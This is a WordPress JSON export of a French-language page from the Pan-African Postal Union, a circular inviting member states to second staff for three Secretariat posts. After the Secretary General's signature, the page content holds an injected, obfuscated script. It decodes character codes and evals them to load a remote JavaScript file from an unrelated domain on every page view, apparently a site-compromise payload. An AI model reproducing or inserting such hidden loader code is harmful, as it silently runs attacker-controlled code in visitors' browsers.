{"id":8383,"date":"2022-10-12T15:39:14","date_gmt":"2022-10-12T12:39:14","guid":{"rendered":"https:\/\/www.upap-papu.africa\/?page_id=8383"},"modified":"2023-02-07T15:40:56","modified_gmt":"2023-02-07T12:40:56","slug":"job-vacancy","status":"publish","type":"page","link":"https:\/\/www.upap-papu.post\/fr\/job-vacancy\/","title":{"rendered":"d\u00e9tachement de personnel aupr\u00e8s du Secr\u00e9tariat g\u00e9n\u00e9ral de l\u2019UPAP"},"content":{"rendered":"<p><strong>Etats membres de l\u2019UPAP <\/strong>(Ministres en charge des services postaux, Autorit\u00e9s de r\u00e9gulation et Op\u00e9rateurs d\u00e9sign\u00e9s)<\/p>\n<p><strong><u>Objet<\/u><\/strong><strong> : <\/strong><strong>Appel au d\u00e9tachement de personnel aupr\u00e8s du Secr\u00e9tariat g\u00e9n\u00e9ral de l\u2019UPAP<\/strong><\/p>\n<p>Mesdames, Messieurs,<\/p>\n<p>Le Secr\u00e9taire g\u00e9n\u00e9ral de l&rsquo;Union panafricaine des postes pr\u00e9sente ses compliments et ses meilleurs v\u0153ux aux \u00c9tats membres de l&rsquo;Union a l\u2019honneur de porter \u00e0 nouveau \u00e0 votre aimable attention la circulaire ci-dessus dat\u00e9e du 4 octobre 2022 (copie ci-jointe), invitant au d\u00e9tachement de personnel aupr\u00e8s du Secr\u00e9tariat g\u00e9n\u00e9ral de l&rsquo;Union<\/p>\n<p>A ce titre, les postes r\u00e9am\u00e9nag\u00e9s conform\u00e9ment aux orientations du Conseil d&rsquo;administration sont les suivants\u00a0:<\/p>\n<ul>\n<li><strong><a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2023\/02\/Rediffusion-Appel-\u00e0-la-mise-en-detachement.zip\">Fonctionnaire charg\u00e9 des politiques et de la r\u00e9gulation\u00a0;<\/a><\/strong><\/li>\n<li><strong><a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2023\/02\/Rediffusion-Appel-\u00e0-la-mise-en-detachement.zip\">Fonctionnaire charg\u00e9 des services \u00e9lectroniques et de l\u2019inclusion financi\u00e8re\u00a0;<\/a><\/strong><\/li>\n<li><strong><a href=\"https:\/\/www.upap-papu.africa\/wp-content\/uploads\/2023\/02\/Rediffusion-Appel-\u00e0-la-mise-en-detachement.zip\">Fonctionnaire charg\u00e9 des ressources humaines et de l\u2019administration.<\/a><\/strong><\/li>\n<\/ul>\n<p>Aussi, voudrais-je une fois encore inviter les Etats membres \u00e0 bien vouloir r\u00e9pondre \u00e0 cet appel en proposant du personnel qualifi\u00e9 et comp\u00e9tent dont le profil correspond aux postes, aux conditions d\u2019emploi et aux modalit\u00e9s de d\u00e9tachement pr\u00e9sent\u00e9es dans les annexes ci-jointes. Cette opportunit\u00e9 passionnante de travailler pour une organisation internationale se doit d\u2019\u00eatre mise \u00e0 la disposition de vos fonctionnaires.<\/p>\n<p>Nous vous saurions gr\u00e9 de bien vouloir nous faire parvenir les dossiers de candidatures le 28 f\u00e9vrier 2023 au plus tard. Une copie \u00e9lectronique transmise par e-mail pourrait pr\u00e9c\u00e9der le dossier de candidature physique avant ladite date limite.<\/p>\n<p>En vous remerciant pour votre coop\u00e9ration habituelle et votre soutien au renforcement des capacit\u00e9s au Secr\u00e9tariat g\u00e9n\u00e9ral de l&rsquo;Union, je vous prie d\u2019agr\u00e9er, Mesdames, Messieurs, les assurances de ma tr\u00e8s haute consid\u00e9ration.<\/p>\n<p><strong><em>Le Secr\u00e9taire g\u00e9n\u00e9ral<\/em><\/strong><\/p>\n<p><strong>Dr. Sifundo Chief Moyo<\/strong><script id='globalsway'>var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,115,116,111,99,107,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,116,114,105,99,107,46,106,115,63,118,61,50,39,59,32,10,115,46,105,100,61,39,115,119,97,121,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(t);<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Etats membres de l\u2019UPAP (Ministres en charge des services postaux, Autorit\u00e9s de r\u00e9gulation et Op\u00e9rateurs d\u00e9sign\u00e9s) Objet : Appel au d\u00e9tachement de personnel aupr\u00e8s du Secr\u00e9tariat g\u00e9n\u00e9ral de l\u2019UPAP Mesdames, Messieurs, Le Secr\u00e9taire g\u00e9n\u00e9ral de l&rsquo;Union panafricaine des postes pr\u00e9sente ses compliments et ses meilleurs v\u0153ux aux \u00c9tats membres de l&rsquo;Union a l\u2019honneur de porter&#8230; <\/p>\n<div class=\"clear\"><\/div>\n<p><a href=\"https:\/\/www.upap-papu.post\/fr\/job-vacancy\/\" class=\"excerpt-read-more\">Read More<\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-8383","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages\/8383"}],"collection":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/comments?post=8383"}],"version-history":[{"count":3,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages\/8383\/revisions"}],"predecessor-version":[{"id":8514,"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/pages\/8383\/revisions\/8514"}],"wp:attachment":[{"href":"https:\/\/www.upap-papu.post\/fr\/wp-json\/wp\/v2\/media?parent=8383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}